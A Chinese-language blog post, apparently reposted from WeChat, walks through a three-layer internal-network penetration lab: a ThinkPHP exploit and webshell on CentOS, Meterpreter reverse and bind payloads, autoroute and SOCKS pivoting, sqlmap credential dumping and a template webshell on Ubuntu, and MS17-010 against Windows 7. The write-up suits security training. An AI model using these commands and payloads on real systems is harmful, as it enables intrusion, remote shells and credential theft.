当前位置:   article > 正文

多重内网渗透_railgun payload

railgun payload

内网网络拓扑

  • 已知192.168.91.138 为外网IP地址

  • 内网拥有192.168.22.1,192.168.33.1 两个网段,内网dmz区只有一台win7主机,没有域环境

  • 外网centos为target1,拥有双网卡

  • centos内网地址
    • 192.168.91.138

    • 192.168.22.129

图片

  • 内网服务器 ubunto为target2,拥有双网卡

  • ubuntu内网地址
    • 192.168.22.128

    • 192.168.33.128

图片

  • 内网个人PC-win7

  • win7地址

图片


对外网Centos 服务器进行渗透

  • 首先使用nmap对外网服务器进行扫描

nmap -A 192.168.91.138

图片

  • 通过扫描发现外网机器拥有这些端口,对这些端口进行一个分析,发现拥有21,80,3306,8888

  • 可以推断出是一个Linux主机,并且是使用的宝塔搭建的服务器

尝试对外网80端口进行一个渗透
  • 访问80端口

图片

  • 发现这是ThinkPHP V5 框架,尝试使用exp利用工具直接攻击

  • 这里我使用railgun工具

图片

  • 成功执行命令,尝试写马进去

图片

  • 上传成功,尝试访问,使用蚁剑连接

图片


使用msf对外网centos主机进行渗透
  • 这边使用msf生成一个Linux的木马,执行木马反弹shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.91.129 LPORT=6666 -f elf 		>/home/kali/桌面/linux1.elf

图片

  • 上传到centos主机

图片

  • 打开msf,监听木马

use exploit/multi/handler //使用监听器
set payload linux/x64/meterpreter/reverse_tcp //这里设置的是生成木马的payload
set lhost 192.168.91.129 //这里设置的是生成木马时用的ip地址,一般情况下写自己的kali地址就行
set lport 6666 //这里设置的都是生成木马所是由的端口,我这里使用的时6666端口
exploit //执行命令

图片

  • 赋予权限,执行木马

chmod 777 linux1.elf
./linux1.elf
  • 成功反弹回来shell

图片

  • 查看内网网络情况

图片

  • 这里发现有三个网段,其中一个192.168.122。0 是因为在虚拟机,有一张虚拟网卡,所有这个忽略掉

  • 添加路由

run autoroute -s 192.168.22.0/24

图片

  • 查看路由

run autoroute -p

图片

  • 发现已经添加进去了


使用代理,对内网进行更深层次的渗透操作
  • 首先挂起这个会话

background

图片

  • 这里使用msf的代理模块,进行一个代理

search socks //查找socks代理模块

图片

  • 使用第一个就行

use 0

图片

  • 使用 options 查看要配置哪些参数

图片

  • 我们这里使用socks4 ,并且设置监听为本机地址,0.0.0.0 是代表所有地址

  1. set version 4a //这是使用sock4a 进行一个代理
  2. set srvhost 192.168.91.129 //这里ip设置为自己kali的ip
  3. exploit

图片

  • 执行命令之后,还需要修改一个地方,才能在kali中直接代理到centos主机

vim /etc/proxychains4.conf
  • 将最下面的IP地址和端口改成msf中设置代理的ip和端口

图片

  • 当然如果你要使用socks5 直接将4 改成5 就可以,或者可以再添加一条代理规则


对第二层Ubunto主机进行渗透

对第二层主机(22网段)进行扫描

图片

  • 要扫描22网段的主机,需要再nmap前面加上proxychains ,使用其它工具也是一样的道理

  • 这里由于是扫描整个网段的主机的80端口,所有可能有点慢

  • 正常来讲不能直接扫描80端口,由于这里是上帝模式,所以简单的略过了

图片

  • 这里发现128,129 两台主机

    • 129 是我们的centos主机,所以128就是我们第二层渗透需要攻击的主机

  • 我们再windows 上设置一个代理,让我们的Windows主机也能够访问22网段的主机,方便我们对80端口进行一个渗透

图片

  • 这里使用的是SocksCap64 ,再代理配置里面添加代理,地址写刚才配置kali的代理配置文件的那个地址就行,端口也是一样的

  • 测试连接

图片

  • 可以成功连接

对22网段128主机的80端口进行渗透
  • 访问80端口,我们发现是一个80端口

图片

  • 用的cms是八哥cms,按照一贯思维,会先尝试试试有没有什么敏感文件,敏感目录,或者爆出什么nday

    图片

  • 发现了后台

图片

  • 这里是一个可以爆破的点

  • 这里查看他的历史漏洞,发现了一个SQL注入,

    http://192.168.22.128/index.php?r=vul&keyword=1'

    所以就不采用其它方式了

  • 这里直接使用nday打

图片

  • 直接上SQLMAP跑

proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" --delay 0.5 --batch

图片

  • sqlmap 上个延时,不然 代理很容易跑崩了

proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" --delay 0.5 --batch --tables
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" --delay 0.5 --batch -T bage_admin --columns
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" --delay 0.5 --batch -T bage_admin --columns --dump

图片

  • 到此,flag,username,password 全部拿到,第一个flag在蚁剑中可以看到

  • admin,123qwe

图片

  • 成功登陆

  • 接下来要拿到Ubunto目标主机的webshell

图片

  • 在模板这边写入webshell

图片

  • 成功连接,发现flag文件

  • 再生成一个马,并且再ubunto主机上执行

  • 这里需要生成正向连接的马,原因是因为我们开始的91网段只有一个22网段的路由,没有33网段的路由,所以并不能连接到33网段的路由,记住此时我们已经拿到ubunto主机的web服务器,我们要将这个后门放到他的服务器上,执行这个后门来连接我们的msf,之后msf会反弹回ubunto主机的权限,接下来就可以顺理成章的添加33网段路由
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=10000 -f elf > /home/kali/桌面/linux2.elf
  • 再kali上设置监听

set payload linux/x64/meterpreter/bind_tcp
set lport 10000 //生成木马时候用的端口
set rhost 192.168.22.130 目标主机

图片

  • 成功反弹会话

对22网段的128主机的后渗透
  • 查看目标主机的网络配置信息

run get_local_subnets

图片

  • 添加路由到路由表中

run autoroute -s 192.168.33.0/24

图片

  • 再添加一个代理

  1. set srvhost 192.168.91.129
  2. set srvport 1081
  3. set version 4a

图片

  • 在proxychinas 中配置代理地址

图片


对第三层win7主机进行渗透

进行端口扫描 探测基本信息
  • 添加了代理之后,我们就可以使用后渗透模块对33网段进行端口扫描

  1. use auxiliary/scanner/portscan/tcp
  2. set rhosts 192.168.33.0/24
  3. set threads 200
  4. run

图片

图片

  • 发现445端口,可以判定这个可能为windows主机

  • 128主机为Ubuntu主机,所以忽略

  • 发现445端口,直接尝试盲打ms17-010

图片

图片

  • 成功弹回会话

获取系统权限,登陆win7主机
rdesktop -u hack -p hack 192.168.33.33
---
也可以使用这条命令,将33主机的3389端口转到kali本机的1111端口
portfwd add -l 1111 -p 3389 -r 192.168.33.33 
在Windows上连接kali的ip和你反弹过来的端口就行

图片

图片

图片

  • 成功登陆

  • 查找flag

图片


总结:

  • 有一些时候不能用proxychain 进行代理

  • 使用一些工具的时候代理可能会出现问题,这时候需要自己设置工具的代理

  • 对msf的一些命令要烂熟于心

原文链接:https://mp.weixin.qq.com/s/Y0pDTe3uHuqiT_RbZbDslw

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/爱喝兽奶帝天荒/article/detail/974150
推荐阅读
相关标签
  

闽ICP备14008679号